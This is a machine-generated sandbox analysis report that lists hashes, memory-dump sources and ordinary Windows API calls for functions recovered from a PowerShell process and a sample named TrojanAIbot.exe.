Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f259e7ec01dd3cc20fbd85f5508a7124460cb9507453411f598d9a96dbfe553
Instruction ID: ee3c38294b4c2c5ba0491ad5b608341b0e73f521206b67158d6ae7cd356ce66d
Opcode Fuzzy Hash: 7f259e7ec01dd3cc20fbd85f5508a7124460cb9507453411f598d9a96dbfe553
Instruction Fuzzy Hash: 09E0C231301619478612A62EA81085F77DADFC5671325483EF00DC7344DF64DD064BE6

Function 0306DD70 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction ID: fb31d0452a9f54b0b746e24eda7dbbcb690bd60ade88ac6959e085d0a0226c60
Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
Instruction Fuzzy Hash: F0E08631B00014978B08E699D4505DDF7A5DBCC220F04847FD90AA7340DA32691686D1

Function 03068739 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5138f69d37f4ad612d774c3ea0d7c6360b9ad46965d0d28fb38f33ca368a2a67
Instruction ID: bcc29c41809f837e2bb2313f39a1eec4b79095930d876b00d16ad3e8e6dea922
Opcode Fuzzy Hash: 5138f69d37f4ad612d774c3ea0d7c6360b9ad46965d0d28fb38f33ca368a2a67
Instruction Fuzzy Hash: 25E04F3180815D9BCF49EBB4D85A4EE7F34EB15301B5044DCDA9782192DA615947CBC1

Function 0306C580 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5026475bdec0111314593d5015c25687f39f7b6c14e85a6535ab186177d90061
Instruction ID: a1e105145584f444f5a285abdceb313b20d5853d1078579cf952cd1fc6b466fe
Opcode Fuzzy Hash: 5026475bdec0111314593d5015c25687f39f7b6c14e85a6535ab186177d90061
Instruction Fuzzy Hash: 55E0C23230A1901F8745637CA8144ADBFE1EBD63A131900BFF68AC3383DA15CC06C7A1

Function 03068800 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c0fd7273df279c72b9df987bcbd9068990398271a3017f8047d1453f8683fd
Instruction ID: 615cd981ba4e9cdf902565fb318ed611668a2df06d12fe3bea64f2cffe784df2
Opcode Fuzzy Hash: c7c0fd7273df279c72b9df987bcbd9068990398271a3017f8047d1453f8683fd
Instruction Fuzzy Hash: D0E04F30D0924A9BCB59DBB8D44686FFFB0EB46214B2482ADD98AD7207D6311846CF81

Function 0306C590 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 109c19b6751b359c259344b887fcd5789d5006e23e7c54771d27f66d66e5171c
Instruction ID: fa13be46375141c28c96b88afab39dc45c01b90a1696406fb5da297f8902c705
Opcode Fuzzy Hash: 109c19b6751b359c259344b887fcd5789d5006e23e7c54771d27f66d66e5171c
Instruction Fuzzy Hash: 5ED0A7313010141B4604636DF40545977D9D7C9662311007FF60DC3341DF21DC0683E5

Function 0306F460 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e42eea119187de022c35655fff951ee820c44af95f0cbe4fc0a5b3c87cb116b0
Instruction ID: 44e8f0860158657190e203e1c075f7e77301655e1a607f86fe2f5d42bdbedcbb
Opcode Fuzzy Hash: e42eea119187de022c35655fff951ee820c44af95f0cbe4fc0a5b3c87cb116b0
Instruction Fuzzy Hash: DEE04F70D042469FCB80DFBD88415ADFFF0EB4A340B1086AEC949D7605E3328612CF81

Function 0306F470 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: 649ec2134012922d1e4c5d20032c3d33a6cf68edec46c707bb4bdee00eb93e10
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: B2D067B0D0520A9F8780EFADD94156EFBF4EB48200F6085AA8919E7701E7329A12CBD1

Function 03068748 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1688cd930c972c35a99895f101dcc18a1223c8fcf7275313035d0e36112d0938
Instruction ID: c9099b86946a16bc9da5c28563f43cd61adc8e6cdb0e4825e8627e361587cd74
Opcode Fuzzy Hash: 1688cd930c972c35a99895f101dcc18a1223c8fcf7275313035d0e36112d0938
Instruction Fuzzy Hash: 9CD0173080411D8BCF48EBA4E81A4BEBB34FA10301F5041ADD91792191EA701A4ACBC0

Function 03068810 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eab1c65750909862be435efefc17315a899032bf6553e3fe5d3263517e2ec99
Instruction ID: ca2aed8bfb831c80d66a7ea1ec9d59e742ef135dac2746710ae08a9f33700013
Opcode Fuzzy Hash: 6eab1c65750909862be435efefc17315a899032bf6553e3fe5d3263517e2ec99
Instruction Fuzzy Hash: C0D01734A0820E8F8B48EFA4E44A86EBBB5EB45200F1081A9DD49D3344EA306901CBC1

Function 03067932 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a56d189181ed6481c49ba75a64e233f48e544dc6f241ccb8ed46e05357d933
Instruction ID: 348ad7fa04d313d05675e2ecdec203d11399a778538b2a892d9237785637550a
Opcode Fuzzy Hash: 04a56d189181ed6481c49ba75a64e233f48e544dc6f241ccb8ed46e05357d933
Instruction Fuzzy Hash: 89D0C7715097C19FDB0EAF74D9A84107F34AE0730431604CFD4964F1B3CA365589CB15

Function 03067EA0 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f7c88a0363a16d39513091479649302b91888f441f0a387a4373b98f318b639
Instruction ID: 94edb498033a5c43cda787feedf4eec2b9390b70a2f7cf1c6d6e3f166472965f
Opcode Fuzzy Hash: 5f7c88a0363a16d39513091479649302b91888f441f0a387a4373b98f318b639
Instruction Fuzzy Hash: 28C04C764496805FFB0B9B249A69A057F75A91330430B11CAD083CB8B2C7650947CF22

Function 03067940 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7aef8cb987d8e5d2d98b0e14884000cbe4857b1dfbc0709a5de8c41c153f70ab
Instruction ID: 40b6d7021357b76237f26e0bac1bfcded08ba228b22c9abf2fbc73b579ce58f4
Opcode Fuzzy Hash: 7aef8cb987d8e5d2d98b0e14884000cbe4857b1dfbc0709a5de8c41c153f70ab
Instruction Fuzzy Hash: 67B092300447088FC6486F79A804814732DEB4561939004ECE94F0A292CE36E989CA45

Non-executed Functions

Function 07803928 Relevance: 10.3, Strings: 8, Instructions: 314COMMON

Download Yara Rule

Strings

4']q, xrefs: 07803B29
$]q, xrefs: 07803C0E
4']q, xrefs: 07803B35
$]q, xrefs: 07803960
$]q, xrefs: 0780396C
tP]q, xrefs: 078039A5
tP]q, xrefs: 078039B1
$]q, xrefs: 0780393A

Memory Dump Source

Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
API String ID: 0-1910532044
Opcode ID: 4203dd50d81414e3d99359f8560ffbeb46c4915862bf587b8109254d2b9163eb
Instruction ID: bce8ab56de2c3acb606b41a47372f5de5d917890f091c289f1a411b76ec2dbc7
Opcode Fuzzy Hash: 4203dd50d81414e3d99359f8560ffbeb46c4915862bf587b8109254d2b9163eb
Instruction Fuzzy Hash: B9A167B17042459FCB649F698C5076ABBE2AFD6724F1480AFD445CB3D2CA35C881C7E1

Function 07801BE0 Relevance: 9.1, Strings: 7, Instructions: 395COMMON

Download Yara Rule

Strings

4']q, xrefs: 07801F89
4']q, xrefs: 07801C92
piyj, xrefs: 07801C73
tP]q, xrefs: 07801FEB
4']q, xrefs: 07801F95
tP]q, xrefs: 07801FDF
4']q, xrefs: 07801C86

Memory Dump Source

Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$piyj$tP]q$tP]q
API String ID: 0-2327987307
Opcode ID: c275c7bbc43d0b02249538e6c42a79f9cf313a0d9511e57c2086ade8fe1e484e
Instruction ID: 4de777a2c871d1c2c790fec437a371a8a97c45372393a7642554181faf59b61c
Opcode Fuzzy Hash: c275c7bbc43d0b02249538e6c42a79f9cf313a0d9511e57c2086ade8fe1e484e
Instruction Fuzzy Hash: C7D12BB1F0424A8FCB659F6C984866EBBE2BF96321F1480BBD545CB291DB31C885C7D1

Function 07803678 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

$]q, xrefs: 07803836
4']q, xrefs: 0780372E
4']q, xrefs: 07803722
$]q, xrefs: 0780382A
$]q, xrefs: 078037FF

Memory Dump Source

Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: 7e5c142f489235ddc283aadd9c66291e8df374065b9832ebb6d0945aa765041a
Instruction ID: 40fb8a791175af2e00cea0c549e6d295c4f591db4d32c6bfb4d1fe620e50fd48
Opcode Fuzzy Hash: 7e5c142f489235ddc283aadd9c66291e8df374065b9832ebb6d0945aa765041a
Instruction Fuzzy Hash: FD5188F570834A9FDB644E298C04766BBA2AFE6615F2480BFD445CB6C1DB35C881C7E1

Function 03067A21 Relevance: 5.2, Strings: 4, Instructions: 237COMMON

Download Yara Rule

Strings

`^q, xrefs: 03067BA2
`^q, xrefs: 03067C44
`^q, xrefs: 03067B23
`^q, xrefs: 03067CC2

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: 496028f319de48662a0bd06fbcc46df52078c80cf08e17fe731153644b13a921
Instruction ID: 9a11e16b8fceb38c09d6011bec1446e53ee5873e7d3ce25f7bde8305460c2f70
Opcode Fuzzy Hash: 496028f319de48662a0bd06fbcc46df52078c80cf08e17fe731153644b13a921
Instruction Fuzzy Hash: 52B1CC74E012099FCB45DFA9D590A9DFBF2FF48304F208629E819AB315DB34A945CF90

Function 03067A30 Relevance: 5.2, Strings: 4, Instructions: 234COMMON

Download Yara Rule

Strings

`^q, xrefs: 03067BA2
`^q, xrefs: 03067C44
`^q, xrefs: 03067B23
`^q, xrefs: 03067CC2

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: cc76e13aeef6755d3b0502a5f30f46f4a6679158044b46edfffd41421562135d
Instruction ID: 6232ec21c419474c8cfed99efdcee4985f2bee042a59349f2aae3278fd2687fe
Opcode Fuzzy Hash: cc76e13aeef6755d3b0502a5f30f46f4a6679158044b46edfffd41421562135d
Instruction Fuzzy Hash: E9B1BA74E012099FCB54DFA9D590A9DFBF2FF88304F208629E819AB305DB35A945CF90

Function 03067200 Relevance: 5.2, Strings: 4, Instructions: 209COMMON

Download Yara Rule

Strings

`^q, xrefs: 03067BA2
`^q, xrefs: 03067C44
`^q, xrefs: 03067B23
`^q, xrefs: 03067CC2

Memory Dump Source

Source File: 0000000B.00000002.2251780010.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_3060000_powershell.jbxd

Similarity

API ID:
String ID: `^q$`^q$`^q$`^q
API String ID: 0-4294711580
Opcode ID: 129b33219622bacfcd9c89c6020e38f1756adb385d4d1f8fa10781b1b22b06e5
Instruction ID: 06107823c2a0a63330d6bcc10c66613787d0f777fd150078499a865528b33739
Opcode Fuzzy Hash: 129b33219622bacfcd9c89c6020e38f1756adb385d4d1f8fa10781b1b22b06e5
Instruction Fuzzy Hash: 4BA1A874E012198FCB54DFA9D590A9DFBF2FF48304F24862AE819AB305DB34A955CF90

Function 07805798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 078057F4
$]q, xrefs: 078057C6
$]q, xrefs: 07805800
$]q, xrefs: 078057AA

Memory Dump Source

Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: e70a53f38a5d8b0a175b8add843f796735654b35756d552e40446f951ff59a0f
Instruction ID: 0cb7d0f4fddf993a93aa4b3e73fecd7629b098f00ff63b1ca50cab33650ae6f9
Opcode Fuzzy Hash: e70a53f38a5d8b0a175b8add843f796735654b35756d552e40446f951ff59a0f
Instruction Fuzzy Hash: 902147F131420A9BDBB8592A8C44F67BBDBABE0715F24802AA905CB2C1DD35C8518BB1

Function 07800308 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

4']q, xrefs: 0780037F
$]q, xrefs: 07800352
4']q, xrefs: 07800373
$]q, xrefs: 0780035E

Memory Dump Source

Source File: 0000000B.00000002.2287340842.0000000007800000.00000040.00000800.00020000.00000000.sdmp, Offset: 07800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7800000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: f6b4c26ed8f3602a2c1779af3a019c2acb169350d718439dcd147d6debd9c310
Instruction ID: 49f4ce859b94db263025c68ef83ffb1233e63a39a7e2f107187f51ede43a08db
Opcode Fuzzy Hash: f6b4c26ed8f3602a2c1779af3a019c2acb169350d718439dcd147d6debd9c310
Instruction Fuzzy Hash: 91018F6170E3D64FC72B16381C61665AFB66F93614B2F41D7C081DB293CA194C45C3E7

Analysis Process: TrojanAIbot.exePID: 1476, Parent PID: 3748COMMON

Execution Graph

Execution Coverage:	11.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	478
Total number of Limit Nodes:	44

Executed Functions

Function 065B16C0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,04184164,031BE230,?,00000000,?,00000000,00000000), ref: 065B1877

Strings

Haq, xrefs: 065B1760

Memory Dump Source

Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID: Haq
API String ID: 2492992576-725504367
Opcode ID: 2e4cb53a416fa9921ba2342c353925c9b9aba39a8f70592c3b165d5a5cae71d5
Instruction ID: 4bea4c2647550d4baccd89a9f9f3cdeb941627c6b936246e4e1ae241b556385f
Opcode Fuzzy Hash: 2e4cb53a416fa9921ba2342c353925c9b9aba39a8f70592c3b165d5a5cae71d5
Instruction Fuzzy Hash: AF51AA34700A118FD7A8EB28D864B2E77E7BFC5650B14856AE406CB7A1CF74EC02CB90

Function 02F7D418 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02F7D67E

Memory Dump Source

Source File: 0000000F.00000002.4533326925.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2f70000_TrojanAIbot.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 15ab7dcd55ed12fcea40a3e6616ddf7207237be97061fb58808169d1a49248d4
Instruction ID: ec6e5446fad126e1556efe2580e4d32459c0ddc215d634d28e009a3eb205d161
Opcode Fuzzy Hash: 15ab7dcd55ed12fcea40a3e6616ddf7207237be97061fb58808169d1a49248d4
Instruction Fuzzy Hash: EA813370A00B458FDB24DF29D44479ABBF2FF88344F008A2ED58A9BA40DB74E945CF90

Function 065B3E64 Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065B3F82

Memory Dump Source

Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 952ab8d2e9357b9cf4f0e49e2b3bb2a6c529df86e2ed76f02e8b024dcf3e3666
Instruction ID: d80a04e5fdb95cc6cdb90ea0c4a651a08a6f6f265c4ef59e0840b7e6bb13a778
Opcode Fuzzy Hash: 952ab8d2e9357b9cf4f0e49e2b3bb2a6c529df86e2ed76f02e8b024dcf3e3666
Instruction Fuzzy Hash: 4751C0B1D10319DFDB14CF99C884ADEBBB5BF48300F24812AE819BB250D775A945CF91

Function 065B1B40 Relevance: 1.6, APIs: 1, Instructions: 116
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065B3F82

Memory Dump Source

Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 94154b15849da00799e3eabae90d87adaf08673dd8da7f06efc9fca0a57c9605
Instruction ID: 7181e24eabc3306b977d17074ed980666b5d6a99c72b980c3a60b8fbbe29e3b1
Opcode Fuzzy Hash: 94154b15849da00799e3eabae90d87adaf08673dd8da7f06efc9fca0a57c9605
Instruction Fuzzy Hash: 8851DFB1D10349EFDB14CF99C884ADEBBB5FF48300F24812AE819AB210D775A985CF91

Function 065B1C94 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 065B6671

Memory Dump Source

Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 190d8e903377a0867853f49159f50e8950e2529366e5b74a40d4790321e5bcb8
Instruction ID: d8cfb9b438916b1e6c72b28c37cb163decfbba1966815e8f5c4427494fbf045d
Opcode Fuzzy Hash: 190d8e903377a0867853f49159f50e8950e2529366e5b74a40d4790321e5bcb8
Instruction Fuzzy Hash: 934156B4900309CFCB54CF99C888AAABBF5FF88314F24C459E419AB321D770A841CFA0

Function 065BF8A8 Relevance: 1.6, APIs: 1, Instructions: 86
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: f0a5e7dac192061770902eead9ad3147fb0f7ebf208646d13bf82ae8f53c89bf
Instruction ID: e594bbc1e5a41c0cde88d796389ce7612c8451bd71f0b834f6378e8dd821dab2
Opcode Fuzzy Hash: f0a5e7dac192061770902eead9ad3147fb0f7ebf208646d13bf82ae8f53c89bf
Instruction Fuzzy Hash: 6E315672904259AFCB11CFAAD840AEABFF8FF49310F14805AE958A7251C3359854DFA1

Function 0663483C Relevance: 1.6, APIs: 1, Instructions: 76
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 066348D0

Memory Dump Source

Source File: 0000000F.00000002.4546393435.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6630000_TrojanAIbot.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: adf89d4f3febe431ecaf6df9dbae40a6074ae8fbb32cc767849deac6c15f2c15
Instruction ID: 15dc3821225ddf8298d91b8ef1118b27fa0c3bf663bef3739a170f174e12af99
Opcode Fuzzy Hash: adf89d4f3febe431ecaf6df9dbae40a6074ae8fbb32cc767849deac6c15f2c15
Instruction Fuzzy Hash: 8B3111B0D01219DFDB50CF99C984BCDBBF5AF08314F208029E404AB390DB74A949CF95

Function 066324CC Relevance: 1.6, APIs: 1, Instructions: 74
comclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleGetClipboard.OLE32(?), ref: 066348D0

Memory Dump Source

Source File: 0000000F.00000002.4546393435.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6630000_TrojanAIbot.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 2c28d52b156d1bb2606226b9d8fe1cfcd8225f5ad5f52ef5d5a87f3fa1b5d6c8
Instruction ID: d0388537d05e6f4a80d8cd7fc51bac1877c053257dd8ed23d928d219bf59078d
Opcode Fuzzy Hash: 2c28d52b156d1bb2606226b9d8fe1cfcd8225f5ad5f52ef5d5a87f3fa1b5d6c8
Instruction Fuzzy Hash: 37310FB0D01258EFDB50CF99C984B9EBBF5AB48304F208069E409AB390DBB4A945CF95

Function 02F7E1A0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F7FCD6,?,?,?,?,?), ref: 02F7FD97

Memory Dump Source

Source File: 0000000F.00000002.4533326925.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2f70000_TrojanAIbot.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c068e6f36925cbed4c4b50f219802e04804a08762c0012398fd24fbb6f86c1fa
Instruction ID: 9a5ebecf2833e381210d525a4ee3c2a295dd69affe84d1803af0b5b3ac272b2a
Opcode Fuzzy Hash: c068e6f36925cbed4c4b50f219802e04804a08762c0012398fd24fbb6f86c1fa
Instruction Fuzzy Hash: B821E4B5D00249AFDB10CFAAD584ADEBFF8FB48310F14845AE919A3310D374A954CFA5

Function 02F7FD0A Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02F7FCD6,?,?,?,?,?), ref: 02F7FD97

Memory Dump Source

Source File: 0000000F.00000002.4533326925.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2f70000_TrojanAIbot.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: cdb3f18486973af6a9aaa9c21e4aeee7147154b64316966af4cad6031a621595
Instruction ID: 139c827e4ca0be3c3e85e0d5a85da05e37cb64e0cf0dc5c30e5c01ffa3045046
Opcode Fuzzy Hash: cdb3f18486973af6a9aaa9c21e4aeee7147154b64316966af4cad6031a621595
Instruction Fuzzy Hash: AF21E4B5D00209DFDB10CFA9D984ADEBBF9FB48310F14845AE918A7310D374AA54CFA5

Function 065BD520 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000), ref: 065BD592

Memory Dump Source

Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: c26c894efb55dc26153ee32f795b7f8acf5ab623cf5b009b87fb5ec3670da628
Instruction ID: f57b61b8091c29219245f8be3b467b89fd042c2ce1af8885a67d75cdaa3f643a
Opcode Fuzzy Hash: c26c894efb55dc26153ee32f795b7f8acf5ab623cf5b009b87fb5ec3670da628
Instruction Fuzzy Hash: 792135B6C002498FDB14CFAAC844ADAFFF4EF48310F14856AD458A7251D378A646CFA5

Function 065BE41C Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,065BF8C2,?,?,?,?,?), ref: 065BF967

Memory Dump Source

Source File: 0000000F.00000002.4545392218.00000000065B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_65b0000_TrojanAIbot.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
